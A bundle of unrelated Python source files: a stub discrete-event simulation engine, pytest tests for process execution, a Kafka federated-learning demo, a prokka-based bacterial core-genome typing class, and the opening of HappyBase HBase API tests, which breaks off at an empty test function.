        """Simulation time at which the message was emitted (stub: None)."""
        return None

    @property
    def wire_time(self) -> TimeInterval:
        """Transmission delay of the message -- presumably; TODO confirm (stub: None)."""
        return None
class PinState(Enum):
    # Lifecycle states of a Pin; exact semantics of each state are not
    # established by the visible code -- TODO confirm.
    CLOSED = auto()
    OPEN = auto()
    WAITING = auto()
class Pin:
    """A named connection point on an actor that processes incoming messages."""

    def __init__(self):
        pass

    @property
    def name(self) -> str:
        """Pin identifier (stub: None)."""
        return None

    @property
    def state(self) -> PinState:
        """Current lifecycle state of the pin (stub: None)."""
        return None

    def process(self, msg: Message) -> Time:
        """Process *msg* and return the simulated time it consumed.

        BUG FIX: the original code decorated this method with @property.
        Since ``process`` takes a required ``msg`` argument, any access to
        ``pin.process`` invoked the property getter without that argument
        and raised TypeError, making the method uncallable.  The decorator
        is removed; ``process`` is an ordinary method.
        """
        return 0
class Actor:
    """A named simulation entity that communicates through its pins."""

    def __init__(self):
        pass

    @property
    def name(self) -> str:
        """Actor identifier (stub: None)."""
        return None

    @property
    def pins(self) -> List[Pin]:
        """Connection points owned by this actor (stub: empty)."""
        return []
class Impulse:
    """Source of externally generated messages injected into the simulation."""

    def generate(self) -> List[Message]:
        """Produce the next batch of messages (stub: empty list)."""
        return []
class MsgRouter:
    """Interface for delivering a message toward its target (stub: no-op)."""

    def route(self, msg: Message) -> None:
        pass
class Engine:
    """Base interface of a simulation engine."""

    def step(self, router: MsgRouter) -> TimeInterval:
        """Advance the engine one step; return the simulated time consumed."""
        return 0

    def put(self, msg: Message) -> None:
        """Accept an incoming message for later processing (stub: no-op)."""
        pass
class DiscreteEventEngine(Engine):
    """Placeholder for a discrete-event engine; behavior not yet implemented."""

    def step(self, router: MsgRouter) -> TimeInterval:
        return 0

    def put(self, msg: Message) -> None:
        pass
class ImpulseEngine(Engine):
    """Placeholder for an impulse-driven engine; behavior not yet implemented."""

    def step(self, router: MsgRouter) -> TimeInterval:
        return 0

    def put(self, msg: Message) -> None:
        pass
class ParallelContext(MsgRouter):
    """Steps several engines in parallel waves and routes messages between them.

    Messages produced while engines step in worker processes are funneled
    through a multiprocessing queue and re-dispatched to the engine named by
    the first component of the message target.
    """

    def __init__(self):
        self._engines = []
        self._name_engine_dict = {}
        self._wave_t1 = None        # end time of the current wave, if any
        self._wave_times = []       # per-engine local times within the wave
        self._parall_msg_queue = multiprocessing.Queue()

    def route(self, msg: Message) -> None:
        """Queue *msg* for cross-engine delivery after the parallel step."""
        self._parall_msg_queue.put(msg)

    @property
    def engine_count(self) -> int:
        return len(self._engines)

    @staticmethod
    def _run_parall(funcs_kwargs: List[Tuple[Callable, Dict]]) -> None:
        """Run each (func, kwargs) pair in its own process; wait for all."""
        processes = []
        for func, kwargs in funcs_kwargs:
            p = multiprocessing.Process(target=func, kwargs=kwargs)
            processes.append(p)
            p.start()
        for p in processes:
            p.join()

    def _step_parall(self, engines: List[Engine]) -> List[TimeInterval]:
        def step_engine(engines, out_intervals, index):
            out_intervals[index] = engines[index].step(self)

        intervals = [None] * len(engines)
        # BUG FIX: the original lambda declared a required parameter ``i`` but
        # was invoked with no arguments by Process(target=..., kwargs={}),
        # raising TypeError; it also suffered from late binding of ``i``.
        # Binding the loop index as a default argument fixes both.
        self._run_parall(
            [(lambda index=i: step_engine(engines, intervals, index), {})
             for i in range(len(engines))])
        # NOTE(review): ``intervals`` is a plain list, so writes performed in
        # child processes do not propagate back to this process; a
        # multiprocessing.Manager list or shared Array would be needed for the
        # results to be visible here -- confirm intended semantics.
        self._process_parall_msg_queue()
        return intervals

    def _process_parall_msg_queue(self) -> None:
        """Drain the queue, stripping the leading engine name off each target."""
        queue = self._parall_msg_queue
        while not queue.empty():
            msg = queue.get()
            # NOTE(review): this treats msg.target as a path *string* even
            # though Address is declared as List[str] -- verify.
            path_split = msg.target.split(os.path.sep)
            engine_name = path_split[0]
            path_remaining = os.path.sep.join(path_split[1:])
            msg.retarget(path_remaining)
            self._name_engine_dict[engine_name].put(msg)

    def step(self) -> Tuple[TimeInterval, TimeInterval]:
        """Step every engine still inside the wave; return (min, max) intervals."""
        if not self._engines:
            # BUG FIX: with no engines the original fell into the empty-candidate
            # branch and crashed on max() of an empty sequence.
            return (0, 0)
        cand_engines = [self._engines[i] for i in range(self.engine_count)
                        if (self._wave_t1 is None or
                            self._wave_times[i] < self._wave_t1)]
        if not cand_engines:
            # Every engine reached the wave boundary; advance to the next wave.
            wave_t1 = max(self._wave_times)
            if self._wave_t1 is None or wave_t1 > self._wave_t1:
                # BUG FIX: the original recursed without updating _wave_t1
                # (and compared against None), so the recursion never
                # terminated.  Advance the boundary before retrying.
                self._wave_t1 = wave_t1
                return self.step()
            # BUG FIX: return a (min, max) pair as the annotation promises;
            # the original returned a bare 0 here and a list elsewhere.
            return (0, 0)
        intervals = self._step_parall(cand_engines)
        return (min(intervals), max(intervals))
print("hello") |
test_process.py | """
Tests :mod:`process` module
"""
from multiprocessing import Pipe
from threading import Thread
from time import sleep
import pytest
from taro import ExecutionState, ExecutionError
from taro.jobs.process import ProcessExecution
def test_exec():
    """A child process runs to completion and delivers its payload."""
    receiver, sender = Pipe()
    execution = ProcessExecution(exec_hello, (sender,))
    final_state = execution.execute()
    assert ['hello'] == receiver.recv()
    assert ExecutionState.COMPLETED == final_state
def exec_hello(pipe):
    """Child entry point: send the literal payload ['hello'] and close *pipe*."""
    payload = ['hello']
    pipe.send(payload)
    pipe.close()
def test_failure_error():
    """An exception raised in the child surfaces as ExecutionError."""
    execution = ProcessExecution(exec_failure_error, ())
    with pytest.raises(ExecutionError):
        execution.execute()
def exec_failure_error():
    """Child entry point that fails by raising an exception."""
    raise AssertionError
def test_failure_exit():
    """A non-zero exit code in the child surfaces as ExecutionError."""
    execution = ProcessExecution(exec_failure_exit, ())
    with pytest.raises(ExecutionError):
        execution.execute()
def exec_failure_exit():
    """Child entry point that fails by terminating with exit code 1."""
    # Use sys.exit rather than the site-injected exit() builtin, which is
    # meant for interactive use and may be absent (python -S, frozen apps).
    import sys
    sys.exit(1)
@pytest.mark.skip(reason="Hangs tests executed for all project")
def test_stop():
    """Stopping a running execution yields the STOPPED terminal state."""
    execution = ProcessExecution(exec_never_ending_story, ())
    stopper = Thread(target=stop_after, args=(0.5, execution))
    stopper.start()
    assert execution.execute() == ExecutionState.STOPPED
def exec_never_ending_story():
    """Child entry point that loops forever (used to test stop/interrupt)."""
    while True:
        sleep(0.1)
def stop_after(sec, execution):
    """Sleep *sec* seconds, then request *execution* to stop."""
    sleep(sec)
    execution.stop()
@pytest.mark.skip(reason="Hangs tests executed for all project")
def test_interrupt():
    """Interrupting a running execution surfaces as ExecutionError."""
    execution = ProcessExecution(exec_never_ending_story, ())
    interrupter = Thread(target=interrupt_after, args=(0.5, execution))
    interrupter.start()
    with pytest.raises(ExecutionError):
        execution.execute()
def interrupt_after(sec, execution):
    """Sleep *sec* seconds, then request *execution* to be interrupted."""
    sleep(sec)
    execution.interrupt()
|
example_03_kafkaprocessed.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import time
import numpy as np
from sklearn.datasets import load_iris
from sklearn.utils import resample
from src.admin import Admin
from src.client import Client
from src.server import Server
from src.model import FederatedSGDClassifier
from src.utils import get_logger
LOGGER = get_logger('Example kafka process')
SERVER = 'Atlas:9092'
def run_client(idx, dst):
    """Instantiate and run a federated-learning Client.

    idx : client index, used to derive a unique Kafka group id
    dst : data subset assigned to this client
    """
    model = FederatedSGDClassifier(n_classes=3, n_features=4)
    client = Client(dataset=dst, groupid=f'client.{idx:03d}',
                    model=model, server=SERVER)
    client.run()
def run_server(n_clients, loops):
    """Instantiate and run the federated Server, then log final metrics.

    n_clients : number of participating clients expected
    loops     : maximum number of training iterations
    """
    model = FederatedSGDClassifier(n_classes=3, n_features=4)
    server = Server(n_clients=n_clients, groupid='server.001',
                    model=model, server=SERVER, max_iter=loops)
    server.initialize()
    server.run()
    LOGGER.info(server.current_metrics)
def run_example(n_clients, loops):
    """Run a Kafka-backed federated learning example.

    Use multiprocessing to isolate the server and clients'
    instantiation and running, so as to emulate behaviour
    of distinct participants to the training.

    n_clients : number of clients to spawn
    loops : maximum number of iterations to train for
    """
    # Set up the Kafka backend topics.
    admin = Admin(server=SERVER)
    admin.setup_server()
    # Load the iris dataset and randomly cut it into bootstrapped subsplits.
    # n_samples = n_clients * 100 guarantees np.split's equal-division
    # requirement holds below.
    X, y = load_iris(return_X_y=True)
    X, y = resample(X, y, n_samples=n_clients * 100)
    datasets = list(zip(np.split(X, n_clients), np.split(y, n_clients)))
    # Instantiate processes wrapping the server and clients' code.
    processes = [
        multiprocessing.Process(target=run_server, args=(n_clients, loops))
    ]
    processes.extend([
        multiprocessing.Process(target=run_client, args=(idx, dst))
        for idx, dst in enumerate(datasets)
    ])
    # Run the processes parallelly and wait for them to resolve.
    for proc in processes:
        proc.start()
    for proc in processes:
        proc.join()
if __name__ == '__main__':
    # Demo entry point: 10 clients, 10 training iterations.
    LOGGER.info('Running multiprocessed loop (10 steps) example')
    run_example(n_clients=10, loops=10)
|
coretyper.py | #!/usr/bin/env python3
from olctools.accessoryFunctions.accessoryFunctions import dotter, GenObject, make_dict, MetadataObject, make_path, \
printtime, run_subprocess, write_to_logfile
import olctools.accessoryFunctions.metadataprinter as metadataprinter
from genemethods.assemblypipeline import createobject
from Bio import SeqIO
from collections import defaultdict
from threading import Lock, Thread
from csv import DictReader
from queue import Queue
from glob import glob
import operator
import os
__author__ = 'adamkoziol'
class CoreTyper(object):
    def handler(self):
        """Run the required analyses in order: object creation, profile
        parsing, prokka annotation, CDS discovery, sequence extraction,
        allele matching, sequence typing, and report creation."""
        printtime('Creating and populating objects', self.start)
        self.populate()
        printtime('Populating {} sequence profiles'.format(self.analysistype), self.start)
        self.profiler()
        # Annotate sequences with prokka
        self.annotatethreads()
        # Run the analyses
        self.cdsthreads()
        # Find core coding features
        self.cdssequencethreads()
        # Extract the sequence for each coding feature
        self.allelematchthreads()
        # Determine sequence types from the analyses
        printtime('Determining {} sequence types'.format(self.analysistype), self.start)
        self.sequencetyper()
        # Create reports
        printtime('Creating {} reports'.format(self.analysistype), self.start)
        self.reporter()
    def populate(self):
        """Create sample objects (when not run inside the pipeline) and
        attach the per-sample core-typing attributes: allele files, allele
        names, profile file, allele directory and report directory."""
        # Move the files to subfolders and create objects
        if not self.pipeline:
            self.metadata = createobject.ObjectCreation(self)
        # Create and populate the .core attribute
        for sample in self.metadata.samples:
            setattr(sample, self.analysistype, GenObject())
            sample[self.analysistype].alleles = self.genes
            sample[self.analysistype].allelenames = [os.path.split(x)[1].split('.')[0] for x in self.genes]
            sample[self.analysistype].profile = self.profile
            sample[self.analysistype].alleledir = self.coregenelocation
            sample[self.analysistype].reportdir = os.path.join(sample.general.outputdirectory, self.analysistype)
def profiler(self):
"""
Creates a dictionary from the profile scheme(s)
"""
# Initialise variables
profiledata = defaultdict(make_dict)
profileset = set()
genedict = {}
# Find all the unique profiles to use with a set
for sample in self.metadata.samples:
if sample[self.analysistype].profile != 'NA':
profileset.add(sample[self.analysistype].profile[0])
# Extract the profiles for each set
for sequenceprofile in profileset:
# Clear the list of genes
genelist = []
for sample in self.metadata.samples:
if sequenceprofile == sample[self.analysistype].profile[0]:
genelist = [os.path.split(x)[1].split('.')[0] for x in sample[self.analysistype].alleles]
try:
# Open the sequence profile file as a dictionary
profile = DictReader(open(sequenceprofile))
# Revert to standard comma separated values
except KeyError:
# Open the sequence profile file as a dictionary
profile = DictReader(open(sequenceprofile))
# Iterate through the rows
for row in profile:
# Iterate through the genes
for gene in genelist:
# Add the sequence profile, and type, the gene name and the allele number to the dictionary
try:
profiledata[sequenceprofile][row['ST']][gene] = row[gene]
except KeyError:
pass
# Add the gene list to a dictionary
genedict[sequenceprofile] = sorted(genelist)
# Add the profile data, and gene list to each sample
for sample in self.metadata.samples:
if sample.general.bestassemblyfile != 'NA':
if sequenceprofile == sample[self.analysistype].profile[0]:
# Populate the metadata with the profile data
sample[self.analysistype].profiledata = profiledata[sample[self.analysistype].profile[0]]
# Add the allele directory to a list of directories used in this analysis
self.allelefolders.add(sample[self.analysistype].alleledir)
dotter()
    def annotatethreads(self):
        """
        Use prokka to annotate each strain: build one prokka command per
        sample and hand the samples to the daemon worker threads via the
        queue (workers run self.annotate).
        """
        # Move the files to subfolders and create objects
        # NOTE(review): the result is stored on self.runmetadata, but the
        # loop below (and the rest of the class) iterates
        # self.metadata.samples -- confirm the duplication is intended.
        self.runmetadata = createobject.ObjectCreation(self)
        # Fix headers
        self.headers()
        printtime('Performing prokka analyses', self.start)
        # Create and start threads
        for i in range(self.cpus):
            # Send the threads to the appropriate destination function
            threads = Thread(target=self.annotate, args=())
            # Set the daemon to true - something to do with thread management
            threads.setDaemon(True)
            # Start the threading
            threads.start()
        for sample in self.metadata.samples:
            # Create the prokka attribute in the metadata object
            setattr(sample, 'prokka', GenObject())
            # Per-sample prokka output directory
            sample.prokka.outputdir = os.path.join(sample.general.outputdirectory, 'prokka')
            if not os.path.isdir(sample.prokka.outputdir):
                os.makedirs(sample.prokka.outputdir)
            # TODO Incorporate MASH/rMLST/user inputted genus, species results in the system call
            # Create the system call
            # prokka 2014-SEQ-0275.fasta --force --genus Escherichia --species coli --usegenus --addgenes
            # --prefix 2014-SEQ-0275 --locustag EC0275 --outputdir /path/to/sequences/2014-SEQ-0275/prokka
            sample.prokka.command = 'prokka {} ' \
                                    '--force ' \
                                    '--genus {} ' \
                                    '--species {} ' \
                                    '--usegenus ' \
                                    '--addgenes ' \
                                    '--prefix {} ' \
                                    '--locustag {} ' \
                                    '--outdir {}' \
                .format(sample.general.fixedheaders,
                        self.genus, self.species, sample.name, sample.name, sample.prokka.outputdir)
            self.queue.put(sample)
        self.queue.join()
    def annotate(self):
        """Worker: run the queued prokka command for each sample and record
        the generated output files on the sample's metadata."""
        while True:
            # NOTE(review): a fresh Lock is created on every iteration, so
            # it does not actually serialise logfile writes between the
            # worker threads -- a single shared lock would; confirm intent.
            threadlock = Lock()
            sample = self.queue.get()
            sample.prokka.outputdir = os.path.abspath(sample.prokka.outputdir)
            # Skip re-running prokka if the .gff output already exists
            if not os.path.isfile(os.path.join(sample.prokka.outputdir, '{}.gff'.format(sample.name))):
                # call(sample.prokka.command, shell=True, stdout=self.fnull, stderr=self.fnull)
                out, err = run_subprocess(sample.prokka.command)
                threadlock.acquire()
                write_to_logfile(sample.prokka.command, sample.prokka.command, self.logfile)
                write_to_logfile(out, err, self.logfile)
                threadlock.release()
            # List of the file extensions created with a prokka analysis
            files = ['err', 'faa', 'ffn', 'fna', 'fsa', 'gbk', 'gff', 'log', 'sqn', 'tbl', 'txt']
            # List of the files created for the sample by prokka
            prokkafiles = glob(os.path.join(sample.prokka.outputdir, '*'))
            # Find out which files have been created in the analysis
            for extension in files:
                # If the file was created, set the file path/name as the data for the attribute
                # NOTE(review): split('.')[1] assumes exactly one dot in each
                # file name; names with additional dots would misbehave.
                if extension in [prokka.split('.')[1] for prokka in prokkafiles]:
                    for output in prokkafiles:
                        setattr(sample.prokka, output.split('.')[1], output)
                # Otherwise, populate the attribute with 'NA'
                else:
                    setattr(sample.prokka, extension, 'NA')
            self.queue.task_done()
def headers(self):
"""
The contig ID must be twenty characters or fewer. The names of the headers created following SPAdes assembly
are usually far too long. This renames them as the sample name
"""
for sample in self.metadata.samples:
# Create an attribute to store the path/file name of the fasta file with fixed headers
sample.general.fixedheaders = sample.general.bestassemblyfile.replace('.fasta', '.ffn')
sample.general.fixedheaders = os.path.abspath(sample.general.fixedheaders)
# A list of contigs with modified record.id values
fixedheaders = list()
# Only do this if the file with fixed headers hasn't previously been created
if not os.path.isfile(sample.general.fixedheaders):
# Refseq genomes don't necessarily have underscores (or contig numbers) in the headers
count = 0
formatcount = '{:04d}'.format(count)
for record in SeqIO.parse(open(sample.general.bestassemblyfile, "rU"), "fasta"):
# Split off anything following the contig number
# >2013-SEQ-0129_1_length_303005_cov_13.1015_ID_17624 becomes
# >2013-SEQ-0129_1
record.id = record.id.split('_length')[0]
# Prokka has a requirement that the header is unique and less than or equal to 20 characters
if len(record.id) > 20:
# Extract the contig number from the string - assumption is that this number is the final
# entry in the string, and that there are underscore separating the different components
contignumber = record.id.split('_')[-1] if '_' in record.id else formatcount
# Subtract the length of the contig number (and an additional one for the underscore) from
# 20 for the string slice, and add the contig number at the end
record.id = record.id[:(20 - len(contignumber) - 1)] + '_{}'.format(formatcount)
# Clear the name and description attributes of the record
record.name = ''
record.description = ''
# Add this record to our list
fixedheaders.append(record)
# Open the filtered assembly file
with open(sample.general.fixedheaders, 'w') as formatted:
# Write the records in the list to the file
SeqIO.write(fixedheaders, formatted, 'fasta')
    def cdsthreads(self):
        """
        Determines which core genes from a pre-calculated database are present in each strain.
        Spawns daemon worker threads running self.cds and feeds them samples
        through the dedicated cdsqueue.
        """
        # Create and start threads
        for i in range(self.cpus):
            # Send the threads to the appropriate destination function
            threads = Thread(target=self.cds, args=())
            # Set the daemon to true - something to do with thread management
            threads.setDaemon(True)
            # Start the threading
            threads.start()
        for sample in self.metadata.samples:
            # Mapping of prokka feature id -> core gene name, filled by the workers
            sample[self.analysistype].corepresence = dict()
            self.cdsqueue.put(sample)
        self.cdsqueue.join()
    def cds(self):
        """Worker: scan each sample's prokka .gff for CDS features whose
        gene name is one of the core genes, recording feature id -> gene."""
        while True:
            sample = self.cdsqueue.get()
            with open(sample.prokka.gff, 'r') as gff:
                for feature in gff:
                    # Only interested in the sequence name if it is a CDS
                    if 'CDS' in feature:
                        # Extract the sequence name from the string. Example below
                        # 2013-SEQ-0123-2014_1 Prodigal:2.6 CDS 443 1741 . + 0
                        # ID=0279_00002;Parent=0279_00002_gene;gene=kgtP_1;
                        # inference=ab initio prediction:Prodigal:2.6,similar to AA sequence:UniProtKB:P0AEX3;
                        # locus_tag=0279_00002;product=Alpha-ketoglutarate permease
                        name = feature.split('ID=')[1].split(';')[0]
                        # Add number and names of genes to dictionaries
                        try:
                            gene = feature.split('gene=')[1].split(';')[0]
                            if gene in self.allelenames:
                                sample[self.analysistype].corepresence[name] = gene
                        except IndexError:
                            # Feature line has no gene= attribute; skip it
                            pass
            self.cdsqueue.task_done()
    def cdssequencethreads(self):
        """
        Extracts the sequence of each gene for each strain.
        Spawns daemon worker threads running self.cdssequence and feeds them
        samples through the dedicated sequencequeue.
        """
        # Create and start threads
        for i in range(self.cpus):
            # Send the threads to the appropriate destination function
            threads = Thread(target=self.cdssequence, args=())
            # Set the daemon to true - something to do with thread management
            threads.setDaemon(True)
            # Start the threading
            threads.start()
        for sample in self.metadata.samples:
            # Initialise a dictionary to store the sequence of each core gene
            sample[self.analysistype].coresequence = dict()
            self.sequencequeue.put(sample)
        self.sequencequeue.join()
def cdssequence(self):
while True:
sample = self.sequencequeue.get()
for record in SeqIO.parse(open(sample.prokka.ffn, 'r'), 'fasta'):
# If the gene name is present in the list of core genes, add the sequence to the dictionary
if record.id in sample[self.analysistype].corepresence:
sample[self.analysistype].coresequence[record.id] = str(record.seq)
self.sequencequeue.task_done()
    def allelematchthreads(self):
        """
        Determine allele of each gene.
        Spawns daemon worker threads running self.allelematch and feeds them
        samples through the dedicated allelequeue.
        """
        # Create and start threads
        for i in range(self.cpus):
            # Send the threads to the appropriate destination function
            threads = Thread(target=self.allelematch, args=())
            # Set the daemon to true - something to do with thread management
            threads.setDaemon(True)
            # Start the threading
            threads.start()
        for sample in self.metadata.samples:
            # Mapping of gene name -> matching allele id, filled by the workers
            sample[self.analysistype].allelematches = dict()
            self.allelequeue.put(sample)
        self.allelequeue.join()
def allelematch(self):
while True:
sample = self.allelequeue.get()
# Iterate through all the core genes
for name, gene in sample[self.analysistype].corepresence.items():
# Iterate through all the alleles for the gene
for record in SeqIO.parse(open(self.alleledict[gene], 'r'), 'fasta'):
# If the current genes matches the database alleles
if str(record.seq) == sample[self.analysistype].coresequence[name]:
# Set the gene to the corresponding allele number
sample[self.analysistype].allelematches[gene] = record.id
self.allelequeue.task_done()
    def sequencetyper(self):
        """
        Determines the sequence type of each strain based on comparisons to sequence type profiles.
        Counts, per candidate sequence type, how many of the sample's allele
        matches agree with the profile's reference alleles.
        """
        for sample in self.metadata.samples:
            if sample.general.bestassemblyfile != 'NA':
                if type(sample[self.analysistype].allelenames) == list:
                    # Only type samples that have an associated profile
                    if sample[self.analysistype].profile != 'NA':
                        # Initialise dictionaries
                        sample[self.analysistype].profilematches = dict()
                        sample[self.analysistype].sequencetypematches = dict()
                        # Create the profiledata variable to avoid writing self.profiledata[self.analysistype]
                        profiledata = sample[self.analysistype].profiledata
                        # For each gene
                        for gene in sorted(sample[self.analysistype].allelenames):
                            try:
                                # NOTE(review): assumes allele ids look like
                                # 'gene-<number>' -- confirm against the database
                                allelenumber = sample[self.analysistype].allelematches[gene].split('-')[1]
                                # Find the profile with the most alleles in common with the query genome
                                for sequencetype in profiledata:
                                    # refallele is the allele number of the sequence type
                                    refallele = profiledata[sequencetype][gene]
                                    if allelenumber == refallele:
                                        # Add matching alleles
                                        try:
                                            sample[self.analysistype].profilematches[sequencetype] += 1
                                            sample[self.analysistype].sequencetypematches[sequencetype].append(
                                                refallele)
                                        except KeyError:
                                            sample[self.analysistype].profilematches[sequencetype] = 1
                                            sample[self.analysistype].sequencetypematches[sequencetype] = list()
                                            sample[self.analysistype].sequencetypematches[sequencetype].append(
                                                refallele)
                            except KeyError:
                                # Gene had no allele match for this sample
                                pass
    def reporter(self):
        """
        Parse the results into a report: for each sample, the closest
        database sequence type, match/mismatch/NA counts, and each gene's
        query allele (with the reference allele noted on mismatch).
        """
        # Initialise variables
        # NOTE(review): header is rebuilt for every sample (last one wins),
        # which assumes all samples share the same sorted gene list.
        header = ''
        row = ''
        databasedict = dict()
        # Load the database sequence type into a dictionary
        strainprofile = os.path.join(self.profilelocation, 'strainprofiles.txt')
        # NOTE(review): the file handle opened here is never closed.
        databaseprofile = DictReader(open(strainprofile))
        # Put the strain profile dictionary into a more easily searchable format
        for data in databaseprofile:
            databasedict[data['Strain']] = data['SequenceType']
        for sample in self.metadata.samples:
            closestmatches = list()
            if sample[self.analysistype].reportdir != 'NA':
                if type(sample[self.analysistype].allelenames) == list:
                    # Populate the header with the appropriate data, including all the genes in the list of targets
                    header = 'Strain,SequenceType,Matches,Mismatches,NA,TotalGenes,ClosestDatabaseMatch,{},\n' \
                        .format(','.join(sorted(sample[self.analysistype].allelenames)))
                    # Best-scoring sequence type (by number of matching alleles)
                    sortedmatches = sorted(sample[self.analysistype].profilematches.items(),
                                           key=operator.itemgetter(1), reverse=True)[0]
                    closestseqtype = sortedmatches[0]
                    # Pull out the closest database match
                    for strain, seqtype in databasedict.items():
                        if seqtype == closestseqtype:
                            closestmatches.append(strain)
                    sample[self.analysistype].closestseqtype = closestseqtype
                    nummatches = int(sortedmatches[1])
                    numna = 0
                    queryallele = list()
                    # Get all the alleles into a list
                    for gene, allele in sorted(sample[self.analysistype].profiledata[closestseqtype].items()):
                        try:
                            # Extract the allele (anything after the -) from the allele matches
                            query = sample[self.analysistype].allelematches[gene].split('-')[1]
                            if allele == query:
                                queryallele.append(query)
                            else:
                                queryallele.append('{} ({})'.format(query, allele))
                        except KeyError:
                            queryallele.append('NA')
                            numna += 1
                    mismatches = len(sample[self.analysistype].alleles) - nummatches - numna
                    row += '{},{},{},{},{},{},{},{}'\
                        .format(sample.name, closestseqtype, nummatches, mismatches, numna,
                                len(sample[self.analysistype].alleles), ','.join(closestmatches), ','.join(queryallele))
                    row += '\n'
        # Create the report folder
        make_path(self.reportpath)
        # Create the report containing all the data from all samples
        with open(os.path.join(self.reportpath, '{}.csv'.format(self.analysistype)), 'w') as combinedreport:
            # Write the results to this report
            combinedreport.write(header)
            combinedreport.write(row)
def __init__(self, inputobject):
self.path = inputobject.path
self.sequencepath = inputobject.sequencepath
self.start = inputobject.start
self.cpus = inputobject.cpus
self.genus = inputobject.genus
self.species = inputobject.species
self.dockerimage = inputobject.dockerimage
self.pipeline = inputobject.pipeline
if not self.pipeline:
self.metadata = MetadataObject()
else:
self.metadata = MetadataObject()
self.metadata.samples = inputobject.metadata
# Folders
try:
self.coregenelocation = inputobject.coregenelocation
except AttributeError:
self.coregenelocation = os.path.join(self.path, 'coregenes', self.genus)
try:
self.profilelocation = inputobject.profilelocation
except AttributeError:
self.profilelocation = os.path.join(self.path, 'profile', self.genus)
self.reportpath = os.path.join(self.path, 'reports')
# Class variables
self.genes = sorted(glob(os.path.join(self.coregenelocation, '*.fasta')))
self.profile = glob(os.path.join(self.profilelocation, '*.txt'))
self.analysistype = 'core'
self.allelenames = sorted([os.path.basename(x).split('.')[0] for x in self.genes])
self.alleledict = dict(zip(self.allelenames, self.genes))
self.allelefolders = set()
self.queue = Queue()
self.dqueue = Queue()
self.cdsqueue = Queue()
self.sequencequeue = Queue()
self.allelequeue = Queue()
self.logfile = inputobject.logfile
self.resultprofile = defaultdict(make_dict)
# Perform typing
self.handler()
# Remove the attributes from the object; they take up too much room on the .json report
for sample in self.metadata.samples:
try:
delattr(sample[self.analysistype], "allelenames")
delattr(sample[self.analysistype], "alleles")
delattr(sample[self.analysistype], "profiledata")
except KeyError:
pass
self.runmetadata = self.metadata
# Print the metadata to file
metadataprinter.MetadataPrinter(self)
|
test_api.py | """
HappyBase tests.
"""
import collections
import os
import random
import threading
from nose.tools import (
assert_dict_equal,
assert_equal,
assert_false,
assert_in,
assert_is_instance,
assert_is_not_none,
assert_list_equal,
assert_not_in,
assert_raises,
assert_true,
)
from happybase import Connection, ConnectionPool, NoConnectionsAvailable
HAPPYBASE_HOST = os.environ.get('HAPPYBASE_HOST')
HAPPYBASE_PORT = os.environ.get('HAPPYBASE_PORT')
HAPPYBASE_COMPAT = os.environ.get('HAPPYBASE_COMPAT', '0.96')
HAPPYBASE_TRANSPORT = os.environ.get('HAPPYBASE_TRANSPORT', 'buffered')
KEEP_TABLE = ('HAPPYBASE_NO_CLEANUP' in os.environ)
TABLE_PREFIX = 'happybase_tests_tmp'
TEST_TABLE_NAME = 'test1'
connection_kwargs = dict(
host=HAPPYBASE_HOST,
port=HAPPYBASE_PORT,
table_prefix=TABLE_PREFIX,
compat=HAPPYBASE_COMPAT,
transport=HAPPYBASE_TRANSPORT,
)
# Yuck, globals
connection = table = None
def maybe_delete_table():
    """Drop a pre-existing test table unless HAPPYBASE_NO_CLEANUP is set."""
    if KEEP_TABLE:
        return
    if TEST_TABLE_NAME in connection.tables():
        print "Test table already exists; removing it..."
        connection.delete_table(TEST_TABLE_NAME, disable=True)
def setup_module():
    """Connect to HBase and (re)create the test table with three families."""
    global connection, table
    connection = Connection(**connection_kwargs)
    assert_is_not_none(connection)
    maybe_delete_table()
    # Three column families exercising default, None, and explicit options
    cfs = {
        'cf1': {},
        'cf2': None,
        'cf3': {'max_versions': 1},
    }
    connection.create_table(TEST_TABLE_NAME, families=cfs)
    table = connection.table(TEST_TABLE_NAME)
    assert_is_not_none(table)
def teardown_module():
    """Delete the test table (unless kept) and close the connection."""
    if not KEEP_TABLE:
        connection.delete_table(TEST_TABLE_NAME, disable=True)
    connection.close()
def test_connection_compat():
    """An unknown compat version string is rejected."""
    with assert_raises(ValueError):
        Connection(compat='0.1.invalid.version')
def test_timeout_arg():
    """A timeout may be supplied without autoconnecting."""
    Connection(timeout=5000, autoconnect=False)
def test_enabling():
    """Tables can be disabled and re-enabled, with state reflected."""
    assert_true(connection.is_table_enabled(TEST_TABLE_NAME))
    connection.disable_table(TEST_TABLE_NAME)
    assert_false(connection.is_table_enabled(TEST_TABLE_NAME))
    connection.enable_table(TEST_TABLE_NAME)
    assert_true(connection.is_table_enabled(TEST_TABLE_NAME))
def test_compaction():
    """Minor and major compaction requests are accepted."""
    connection.compact_table(TEST_TABLE_NAME)
    connection.compact_table(TEST_TABLE_NAME, major=True)
def test_prefix():
    """Table name prefixing is applied, optional, and type-checked."""
    assert_equal(TABLE_PREFIX + '_', connection._table_name(''))
    assert_equal(TABLE_PREFIX + '_foo', connection._table_name('foo'))
    assert_equal(connection.table('foobar').name, TABLE_PREFIX + '_foobar')
    assert_equal(connection.table('foobar', use_prefix=False).name, 'foobar')
    # A connection without a prefix leaves names untouched
    c = Connection(autoconnect=False)
    assert_equal('foo', c._table_name('foo'))
    with assert_raises(TypeError):
        Connection(autoconnect=False, table_prefix=123)
    with assert_raises(TypeError):
        Connection(autoconnect=False, table_prefix_separator=2.1)
def test_stringify():
    """str() and repr() of connections and tables do not raise."""
    str(connection)
    repr(connection)
    str(table)
    repr(table)
def test_table_listing():
    """tables() returns a list containing the test table."""
    names = connection.tables()
    assert_is_instance(names, list)
    assert_in(TEST_TABLE_NAME, names)
def test_table_regions():
    """regions() returns a list of region descriptors."""
    regions = table.regions()
    assert_is_instance(regions, list)
def test_invalid_table_create():
    """create_table rejects empty or non-dict family specifications."""
    with assert_raises(ValueError):
        connection.create_table('sometable', families={})
    with assert_raises(TypeError):
        connection.create_table('sometable', families=0)
    with assert_raises(TypeError):
        connection.create_table('sometable', families=[])
def test_families():
    """families() maps family names to descriptor dicts with known keys."""
    families = table.families()
    for name, fdesc in families.iteritems():
        assert_is_instance(name, basestring)
        assert_is_instance(fdesc, dict)
        assert_in('name', fdesc)
        assert_in('max_versions', fdesc)
def test_put():
    """put() accepts multiple columns and explicit (including long) timestamps."""
    table.put('r1', {'cf1:c1': 'v1', 'cf1:c2': 'v2', 'cf2:c3': 'v3'})
    table.put('r1', {'cf1:c4': 'v2'}, timestamp=2345678)
    table.put('r1', {'cf1:c4': 'v2'}, timestamp=1369168852994L)
def test_atomic_counters():
    """Counter get/set/inc/dec behave atomically and support deltas."""
